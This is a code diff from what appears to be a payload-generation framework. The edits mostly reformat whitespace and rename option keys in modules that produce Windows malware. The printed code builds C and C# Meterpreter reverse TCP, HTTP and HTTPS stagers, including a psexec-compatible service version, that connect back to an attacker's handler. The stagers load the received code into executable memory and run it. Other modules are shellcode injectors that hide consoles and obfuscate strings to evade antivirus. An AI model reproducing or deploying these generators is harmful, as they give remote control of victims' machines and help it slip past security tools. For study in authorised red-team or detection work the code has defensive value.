-            case SERVICE_CONTROL_STOP: 
-                ServiceStatus.dwWin32ExitCode = 0; 
-                ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
+        code += """void ControlHandler(DWORD request)
+    {
+        switch(request)
+        {
+            case SERVICE_CONTROL_STOP:
+                ServiceStatus.dwWin32ExitCode = 0;
+                ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
                 SetServiceStatus (%s, &ServiceStatus);
-                return; 
-            case SERVICE_CONTROL_SHUTDOWN: 
-                ServiceStatus.dwWin32ExitCode = 0; 
-                ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
+                return;
+            case SERVICE_CONTROL_SHUTDOWN:
+                ServiceStatus.dwWin32ExitCode = 0;
+                ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
                 SetServiceStatus (%s, &ServiceStatus);
-                return; 
+                return;
             default:
                 break;
-        } 
+        }
         SetServiceStatus (%s,  &ServiceStatus);
-        return; 
-    } 
+        return;
+    }
     """ %(hStatusName, hStatusName, hStatusName)
 
         return code
-    

--- a/modules/payloads/c/meterpreter/rev_tcp.py
+++ b/modules/payloads/c/meterpreter/rev_tcp.py
@@ -15,44 +15,46 @@ import random
 from modules.common import helpers
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "pure windows/meterpreter/reverse_tcp stager, no shellcode"
         self.language = "c"
         self.extension = "c"
         self.rating = "Excellent"
-        
+
         # optional
         # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {"LHOST" : ["", "IP of the metasploit handler"],
-                                "LPORT" : ["4444", "Port of the metasploit handler"],
-                                "compile_to_exe" : ["Y", "Compile to an executable"]}
-        
+        self.required_options = {
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["4444", "Port of the Metasploit handler"],
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"]
+                                }
+
     def generate(self):
-            
+
         winsock_init_name = helpers.randomString()
         punt_name = helpers.randomString()
         recv_all_name = helpers.randomString()
         wsconnect_name = helpers.randomString()
-        
+
         # the real includes needed
         includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>"]
-        
+
         # max length string for obfuscation
         global_max_string_length = 10000
         max_string_length = random.randint(100,global_max_string_length)
         max_num_strings = 10000
-        
+
         # TODO: add in more string processing functions
         randName1 = helpers.randomString() # reverse()
         randName2 = helpers.randomString() # doubles characters
-        stringModFunctions = [  (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)), 
+        stringModFunctions = [  (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)),
                                 (randName2, "char* %s(char* s){ char *result =  malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2))
                             ]
-                            
+
         helpers.shuffle(stringModFunctions)
-        
+
         # obfuscation "logical nop" string generation functions
         randString1 = helpers.randomString(50)
         randName1 = helpers.randomString()
@@ -69,17 +71,17 @@ class Payload:
                                 (randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, helpers.randomString(50), randVar5, randVar4, randVar5))
                              ]
         helpers.shuffle(stringGenFunctions)
-        
+
         # obfuscation - add in our fake includes
-        fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>", 
+        fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>",
                         "#include <limits.h>", "#include <assert.h>"]
         t = random.randint(1,7)
         for x in xrange(1, random.randint(1,7)):
             includes.append(fake_includes[x])
-        
+
         # shuffle up real/fake includes
         helpers.shuffle(includes)
-        
+
         code = "#define _WIN32_WINNT 0x0500\n"
         code += "#include <winsock2.h>\n"
         code += "\n".join(includes) + "\n"
@@ -87,27 +89,27 @@ class Payload:
         #string mod functions
         code += stringModFunctions[0][1] + "\n"
         code += stringModFunctions[1][1] + "\n"
-        
+
         # build the winsock_init function
         wVersionRequested_name = helpers.randomString()
         wsaData_name = helpers.randomString()
         code += "void %s() {" % (winsock_init_name)
         code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, helpers.obfuscateNum(2,4), helpers.obfuscateNum(2,4), wsaData_name)
         code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name)
-        
+
         # first logical nop string function
         code += stringGenFunctions[0][1] + "\n"
-        
+
         # build punt function
         my_socket_name = helpers.randomString()
         code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name)
         code += "closesocket(%s);" %(my_socket_name)
         code += "WSACleanup();"
         code += "exit(1);}\n"
-        
+
         # second logical nop string function
         code += stringGenFunctions[1][1] + "\n"
-        
+
         # build recv_all function
         my_socket_name = helpers.randomString()
         buffer_name = helpers.randomString()
@@ -122,7 +124,7 @@ class Payload:
 
         # third logical nop string function
         code += stringGenFunctions[2][1] + "\n"
-        
+
         # build wsconnect function
         target_name = helpers.randomString()
         sock_name = helpers.randomString()
@@ -137,14 +139,14 @@ class Payload:
         code += "%s.sin_port = htons(%s);" %(sock_name, helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32))
         code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
         code += "return %s;}\n" %(my_socket_name)
-        
+
         # build main() code
         size_name = helpers.randomString()
         buffer_name = helpers.randomString()
         function_name = helpers.randomString()
         my_socket_name = helpers.randomString()
         count_name = helpers.randomString()
-        
+
         # obfuscation stuff
         char_array_name_1 = helpers.randomString()
         number_of_strings_1 = random.randint(1,max_num_strings)
@@ -152,7 +154,7 @@ class Payload:
         number_of_strings_2 = random.randint(1,max_num_strings)
         char_array_name_3 = helpers.randomString()
         number_of_strings_3 = random.randint(1,max_num_strings)
-        
+
         code += "int main(int argc, char * argv[]) {"
         code += "ShowWindow( GetConsoleWindow(), SW_HIDE );"
         code += "ULONG32 %s;" %(size_name)
@@ -160,45 +162,45 @@ class Payload:
         code += "int i;"
         code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
         code += "void (*%s)();" %(function_name)
-        
+
         # malloc our first string obfuscation array
-        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length)) 
-        
+        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length))
+
         code += "%s();" %(winsock_init_name)
         code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
         code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name)
-        
+
         # malloc our second string obfuscation array
         code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length))
-        
+
         code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (count_name, my_socket_name, size_name, helpers.obfuscateNum(4,2))
         code += "if (%s != %s || %s <= 0) %s(%s);" %(count_name, helpers.obfuscateNum(4,2), size_name, punt_name, my_socket_name)
-        
+
         code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name, size_name, helpers.obfuscateNum(5,2))
         code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
-        
+
         # first string obfuscation method
         code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
-        
+
         # real code
         code += "if (%s == NULL) %s(%s);" %(buffer_name, punt_name, my_socket_name)
         code += "%s[0] = 0xBF;" %(buffer_name)
         code += "memcpy(%s + 1, &%s, %s);" %(buffer_name, my_socket_name, helpers.obfuscateNum(4,2))
-        
+
         # malloc our third string obfuscation array
         code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length))
-        
+
         # second string obfuscation method
         code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
-        
+
         # real code
-        code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, helpers.obfuscateNum(5,2), size_name) 
+        code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, helpers.obfuscateNum(5,2), size_name)
         code += "%s = (void (*)())%s;" %(function_name, buffer_name)
         code += "%s();" %(function_name)
-        
+
         # third string obfuscation method (never called)
         code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
-        
+
         code += "return 0;}\n"
 
         return code

--- a/modules/payloads/c/meterpreter/rev_tcp_service.py
+++ b/modules/payloads/c/meterpreter/rev_tcp_service.py
@@ -17,45 +17,47 @@ import random
 from modules.common import helpers
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode"
         self.language = "c"
         self.extension = "c"
         self.rating = "Excellent"
-        
+
         # optional
         # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {"LHOST" : ["", "IP of the metasploit handler"],
-                                "LPORT" : ["4444", "Port of the metasploit handler"],
-                                "compile_to_exe" : ["Y", "Compile to an executable"]}
-        
+        self.required_options = {
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["4444", "Port of the Metasploit handler"],
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"]
+                                }
+
     def generate(self):
-            
+
         winsock_init_name = helpers.randomString()
         punt_name = helpers.randomString()
         recv_all_name = helpers.randomString()
         wsconnect_name = helpers.randomString()
-        
+
         # the real includes needed
         includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>"]
-        
+
         # max length string for obfuscation
         global_max_string_length = 10000
         max_string_length = random.randint(100,global_max_string_length)
         max_num_strings = 10000
-        
-        
+
+
         # TODO: add in more string processing functions
         randName1 = helpers.randomString() # reverse()
         randName2 = helpers.randomString() # doubles characters
-        stringModFunctions = [  (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)), 
+        stringModFunctions = [  (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)),
                                 (randName2, "char* %s(char* s){ char *result =  malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2))
                             ]
-                            
+
         helpers.shuffle(stringModFunctions)
-        
+
         # obsufcation - "logical nop" string generation functions
         randString1 = helpers.randomString(50)
         randName1 = helpers.randomString()
@@ -71,53 +73,53 @@ class Payload:
                                 (randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, helpers.randomString(50), randVar5, randVar4, randVar5))
                              ]
         helpers.shuffle(stringGenFunctions)
-        
+
         # obfuscation - add in our fake includes
-        fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>", 
+        fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>",
                         "#include <limits.h>", "#include <assert.h>"]
         t = random.randint(1,7)
         for x in xrange(1, random.randint(1,7)):
             includes.append(fake_includes[x])
-        
+
         # obsufcation - shuffle up our real and fake includes
         helpers.shuffle(includes)
 
         code = "#define _WIN32_WINNT 0x0500\n"
         code += "#include <winsock2.h>\n"
         code += "\n".join(includes) + "\n"
-        
-            
+
+
         # real - service related headers (check the stub)
         hStatusName = helpers.randomString()
         serviceHeaders = ["SERVICE_STATUS ServiceStatus;","SERVICE_STATUS_HANDLE %s;" %(hStatusName), "void  ServiceMain(int argc, char** argv);", "void  ControlHandler(DWORD request);"]
         helpers.shuffle(serviceHeaders)
-        
+
         code += "\n".join(serviceHeaders)
-        
+
         # obsufcation - string mod functions
         code += stringModFunctions[0][1] + "\n"
         code += stringModFunctions[1][1] + "\n"
-        
+
         # real - build the winsock_init function
         wVersionRequested_name = helpers.randomString()
         wsaData_name = helpers.randomString()
         code += "void %s() {" % (winsock_init_name)
         code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, helpers.obfuscateNum(2,4),helpers.obfuscateNum(2,4), wsaData_name)
         code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name)
-        
+
         # first logical nop string function
         code += stringGenFunctions[0][1] + "\n"
-        
+
         # real - build punt function
         my_socket_name = helpers.randomString()
         code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name)
         code += "closesocket(%s);" %(my_socket_name)
         code += "WSACleanup();"
         code += "exit(1);}\n"
-        
+
         # obsufcation - second logical nop string function
         code += stringGenFunctions[1][1] + "\n"
-        
+
         # real - build recv_all function
         my_socket_name = helpers.randomString()
         buffer_name = helpers.randomString()
@@ -147,19 +149,19 @@ class Payload:
         code += "%s.sin_port = htons(%s);" %(sock_name, helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32))
         code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name)
         code += "return %s;}\n" %(my_socket_name)
-        
-        
+
+
         # real - main() method for the service code
         serviceName = helpers.randomString()
         code += "void main() { SERVICE_TABLE_ENTRY ServiceTable[2];"
-        serviceTableEntries = [ "ServiceTable[0].lpServiceName = \"%s\";" %(serviceName), 
+        serviceTableEntries = [ "ServiceTable[0].lpServiceName = \"%s\";" %(serviceName),
                                 "ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;",
                                 "ServiceTable[1].lpServiceName = NULL;",
                                 "ServiceTable[1].lpServiceProc = NULL;"]
         helpers.shuffle(serviceTableEntries)
         code += "\n".join(serviceTableEntries)
         code += "StartServiceCtrlDispatcher(ServiceTable);}\n"
-        
+
 
         # real - service status options for us to shuffle
         serviceStatusOptions = ["ServiceStatus.dwWin32ExitCode = 0;",
@@ -170,25 +172,25 @@ class Payload:
                                 "ServiceStatus.dwCheckPoint = 0;",
                                 "ServiceStatus.dwServiceType = SERVICE_WIN32;"]
         helpers.shuffle(serviceStatusOptions)
-        
+
         # real - serviceMain() code
         code += "void ServiceMain(int argc, char** argv) {\n"
         code += "\n".join(serviceStatusOptions)
-        
+
         code += "%s = RegisterServiceCtrlHandler( \"%s\", (LPHANDLER_FUNCTION)ControlHandler);" %(hStatusName, serviceName)
         code += "if (%s == (SERVICE_STATUS_HANDLE)0) return;" %(hStatusName)
         code += "ServiceStatus.dwCurrentState = SERVICE_RUNNING;"
         code += "SetServiceStatus (%s, &ServiceStatus);" %(hStatusName)
-        
+
         code += "while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {\n"
-        
+
         # obsufcation - random variable names
         size_name = helpers.randomString()
         buffer_name = helpers.randomString()
         function_name = helpers.randomString()
         my_socket_name = helpers.randomString()
         count_name = helpers.randomString()
-        
+
         # obsufcation - necessary declarations
         char_array_name_1 = helpers.randomString()
         number_of_strings_1 = random.randint(1,max_num_strings)
@@ -196,83 +198,83 @@ class Payload:
         number_of_strings_2 = random.randint(1,max_num_strings)
         char_array_name_3 = helpers.randomString()
         number_of_strings_3 = random.randint(1,max_num_strings)
-        
+
         # real - necessary declarations
         code += "ULONG32 %s;" %(size_name)
         code += "char * %s;" %(buffer_name)
         code += "int i;"
         code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1)
         code += "void (*%s)();" %(function_name)
-        
+
         # obsufcation - malloc our first string obfuscation array
-        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length)) 
-        
+        code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length))
+
         code += "%s();" %(winsock_init_name)
         code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2)
         code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name)
-        
+
         # obsufcation - malloc our second string obfuscation array
         code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length))
-        
+
         # real - receive the 4 byte size from the handler
         code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (count_name, my_socket_name, size_name, helpers.obfuscateNum(4,2))
         # real - punt the socket if something goes wrong
         code += "if (%s != %s || %s <= 0) %s(%s);" %(count_name, helpers.obfuscateNum(4,2), size_name, punt_name, my_socket_name)
-        
+
         # real - virtual alloc space for the meterpreter .dll
         code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name, size_name, helpers.obfuscateNum(5,2))
-        
+
         # obsufcation - declare space for our 3 string obfuscation array
         code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3)
-        
+
         # obsufcation - first string obfuscation method
         code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0])
-        
+
         # real - check if the buffer received is null, if so punt the socket
         code += "if (%s == NULL) %s(%s);" %(buffer_name, punt_name, my_socket_name)
-        
+
         # real - prepend some buffer magic to push the socket number onto the stack
         code += "%s[0] = 0xBF;" %(buffer_name)
         # real-  copy the 4 magic bytes into the buffer
         code += "memcpy(%s + 1, &%s, %s);" %(buffer_name, my_socket_name, helpers.obfuscateNum(4,2))
-        
+
         # obsufcation - malloc our third string obfuscation array
         code += "for (i = 0;  i < %s;  ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length))
-        
+
         # obsufcation - second string obfuscation method
         code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0])
-        
+
         # real - receive all data from the socket
-        code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, helpers.obfuscateNum(5,2), size_name) 
+        code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, helpers.obfuscateNum(5,2), size_name)
         code += "%s = (void (*)())%s;" %(function_name, buffer_name)
         code += "%s();" %(function_name)
-        
+
         # obsufcation - third string obfuscation method (never called)
         code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0])
-        
+
         code += "} return; }\n"
 
         # service control handler code
-        code += """void ControlHandler(DWORD request) 
-    { 
-        switch(request) 
-        { 
-            case SERVICE_CONTROL_STOP: 
-                ServiceStatus.dwWin32ExitCode = 0; 
-                ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
+        code += """void ControlHandler(DWORD request)
+    {
+        switch(request)
+        {
+            case SERVICE_CONTROL_STOP:
+                ServiceStatus.dwWin32ExitCode = 0;
+                ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
                 SetServiceStatus (%s, &ServiceStatus);
-                return; 
-            case SERVICE_CONTROL_SHUTDOWN: 
-                ServiceStatus.dwWin32ExitCode = 0; 
-                ServiceStatus.dwCurrentState  = SERVICE_STOPPED; 
+                return;
+            case SERVICE_CONTROL_SHUTDOWN:
+                ServiceStatus.dwWin32ExitCode = 0;
+                ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
                 SetServiceStatus (%s, &ServiceStatus);
-                return; 
+                return;
             default:
                 break;
-        } 
+        }
         SetServiceStatus (%s,  &ServiceStatus);
-        return; 
-    } 
+        return;
+    }
     """ %(hStatusName, hStatusName, hStatusName)
 
         return code

--- a/modules/payloads/c/shellcode_inject/flatc.py
+++ b/modules/payloads/c/shellcode_inject/flatc.py
@@ -14,7 +14,7 @@ from modules.common import shellcode
 from modules.common import helpers
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "C Combination of all Injection Methods w/no Obfuscation"
@@ -23,30 +23,32 @@ class Payload:
         self.extension = "c"
 
         self.shellcode = shellcode.Shellcode()
-        # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
-                                 "inject_method" : ["Virtual", "Void, Virtual, or Heap"]}
+        # options we require user ineraction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "INJECT_METHOD"  : ["Virtual", "Void, Virtual, or Heap"]
+                                }
 
     def generate(self):
-        
+
         # Generate Shellcode Using msfvenom
         Shellcode = self.shellcode.generate()
-        
+
         # Generate Random Variable Names
         RandShellcode = helpers.randomString()
         RandReverseShell = helpers.randomString()
         RandMemoryShell = helpers.randomString()
 
-        if self.required_options["inject_method"][0].lower() == "void":
+        if self.required_options["INJECT_METHOD"][0].lower() == "void":
 
             # Start creating our void pointer C payload
             PayloadCode = 'unsigned char payload[]=\n'
             PayloadCode += '\"' + Shellcode + '\";\n'
             PayloadCode += 'int main(void) { ((void (*)())payload)();}\n'
-        
+
             return PayloadCode
 
-        elif self.required_options["inject_method"][0].lower() == "heap":
+        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
 
             # Create out heap injecting C payload
             PayloadCode = '#include <windows.h>\n'

--- a/modules/payloads/cs/meterpreter/rev_http.py
+++ b/modules/payloads/cs/meterpreter/rev_http.py
@@ -12,7 +12,7 @@ from modules.common import encryption
 import random
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "pure windows/meterpreter/reverse_http stager, no shellcode"
@@ -21,12 +21,14 @@ class Payload:
         self.rating = "Excellent"
 
         # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"LHOST"            : ["", "IP of the metasploit handler"],
-                                 "LPORT"            : ["8080", "Port of the metasploit handler"],
-                                 "compile_to_exe"   : ["Y", "Compile to an executable"],
-                                 "use_arya"         : ["N", "Use the Arya crypter"]}
-        
-        
+        self.required_options = {
+                                    "LHOST"            : ["", "IP of the Metasploit handler"],
+                                    "LPORT"            : ["8080", "Port of the Metasploit handler"],
+                                    "COMPILE_TO_EXE"   : ["Y", "Compile to an executable"],
+                                    "USE_ARYA"         : ["N", "Use the Arya crypter"]
+                                }
+
+
     def generate(self):
 
         # imports and namespace setup
@@ -120,7 +122,7 @@ class Payload:
         r = [helpers.randomString() for x in xrange(12)]
         payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
 
-        if self.required_options["use_arya"][0].lower() == "y":
+        if self.required_options["USE_ARYA"][0].lower() == "y":
             payloadCode = encryption.arya(payloadCode)
 
         return payloadCode

--- a/modules/payloads/cs/meterpreter/rev_https.py
+++ b/modules/payloads/cs/meterpreter/rev_https.py
@@ -12,7 +12,7 @@ from modules.common import encryption
 import random
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "pure windows/meterpreter/reverse_https stager, no shellcode"
@@ -21,12 +21,14 @@ class Payload:
         self.rating = "Excellent"
 
         # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"LHOST"            : ["", "IP of the metasploit handler"],
-                                 "LPORT"            : ["8081", "Port of the metasploit handler"],
-                                 "compile_to_exe"   : ["Y", "Compile to an executable"],
-                                 "use_arya"         : ["N", "Use the Arya crypter"]}
-        
-        
+        self.required_options = {
+                                    "LHOST"            : ["", "IP of the Metasploit handler"],
+                                    "LPORT"            : ["8081", "Port of the Metasploit handler"],
+                                    "COMPILE_TO_EXE"   : ["Y", "Compile to an executable"],
+                                    "USE_ARYA"         : ["N", "Use the Arya crypter"]
+                                }
+
+
     def generate(self):
 
         # imports and namespace setup
@@ -83,7 +85,7 @@ class Payload:
         sName = helpers.randomString()
 
         payloadCode += "static byte[] %s(string %s) {\n" %(getDataName,strName)
-        payloadCode += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" %(validateServerCertficateName) 
+        payloadCode += "ServicePointManager.ServerCertificateValidationCallback = %s;\n" %(validateServerCertficateName)
         payloadCode += "WebClient %s = new System.Net.WebClient();\n" %(webClientName)
         payloadCode += "%s.Headers.Add(\"User-Agent\", \"Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\");\n" %(webClientName)
         payloadCode += "%s.Headers.Add(\"Accept\", \"*/*\");\n" %(webClientName)
@@ -128,7 +130,7 @@ class Payload:
         r = [helpers.randomString() for x in xrange(12)]
         payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
 
-        if self.required_options["use_arya"][0].lower() == "y":
+        if self.required_options["USE_ARYA"][0].lower() == "y":
             payloadCode = encryption.arya(payloadCode)
 
         return payloadCode

--- a/modules/payloads/cs/meterpreter/rev_tcp.py
+++ b/modules/payloads/cs/meterpreter/rev_tcp.py
@@ -11,7 +11,7 @@ from modules.common import helpers
 from modules.common import encryption
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "pure windows/meterpreter/reverse_tcp stager, no shellcode"
@@ -20,13 +20,15 @@ class Payload:
         self.rating = "Excellent"
 
         # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"LHOST"            : ["", "IP of the metasploit handler"],
-                                 "LPORT"            : ["4444", "Port of the metasploit handler"],
-                                 "compile_to_exe"   : ["Y", "Compile to an executable"],
-                                 "use_arya"         : ["N", "Use the Arya crypter"]}
-        
-        
-        
+        self.required_options = {
+                                    "LHOST"            : ["", "IP of the Metasploit handler"],
+                                    "LPORT"            : ["4444", "Port of the Metasploit handler"],
+                                    "COMPILE_TO_EXE"   : ["Y", "Compile to an executable"],
+                                    "USE_ARYA"         : ["N", "Use the Arya crypter"]
+                                }
+
+
+
     def generate(self):
 
         getDataName = helpers.randomString()
@@ -89,7 +91,7 @@ class Payload:
         r = [helpers.randomString() for x in xrange(12)]
         payloadCode += """[DllImport(\"kernel32\")] private static extern UInt32 VirtualAlloc(UInt32 %s,UInt32 %s, UInt32 %s, UInt32 %s);\n[DllImport(\"kernel32\")]private static extern IntPtr CreateThread(UInt32 %s, UInt32 %s, UInt32 %s,IntPtr %s, UInt32 %s, ref UInt32 %s);\n[DllImport(\"kernel32\")] private static extern UInt32 WaitForSingleObject(IntPtr %s, UInt32 %s); } }\n"""%(r[0],r[1],r[2],r[3],r[4],r[5],r[6],r[7],r[8],r[9],r[10],r[11])
 
-        if self.required_options["use_arya"][0].lower() == "y":
+        if self.required_options["USE_ARYA"][0].lower() == "y":
             payloadCode = encryption.arya(payloadCode)
 
         return payloadCode

--- a/modules/payloads/cs/shellcode_inject/base64_substitution.py
+++ b/modules/payloads/cs/shellcode_inject/base64_substitution.py
@@ -1,6 +1,6 @@
 """
 
-C# inline injector that utilizes base64 encoding and a randomized alphabetic 
+C# inline injector that utilizes base64 encoding and a randomized alphabetic
 letter substitution cipher to obscure the shellcode string in the payload.
 Uses basic variable renaming obfuscation.
 
@@ -15,23 +15,25 @@ from modules.common import encryption
 from modules.common import helpers
 
 class Payload:
-    
+
     def __init__(self):
         # required
         self.language = "cs"
         self.extension = "cs"
         self.rating = "Normal"
         self.description = "C# method that base64/letter substitutes the shellcode to inject"
-        
+
         self.shellcode = shellcode.Shellcode()
-        # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe"   : ["Y", "Compile to an executable"],
-                                 "use_arya"         : ["N", "Use the Arya crypter"]}
-        
+        # options we require user ineraction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_ARYA"       : ["N", "Use the Arya crypter"]
+                                }
+
     def generate(self):
-        
+
         Shellcode = self.shellcode.generate()
-        
+
         # the 'key' is a randomized alpha lookup table [a-zA-Z] used for substitution
         key = ''.join(sorted(list(string.ascii_letters), key=lambda *args: random.random()))
         base64payload = encryption.b64sub(Shellcode,key)
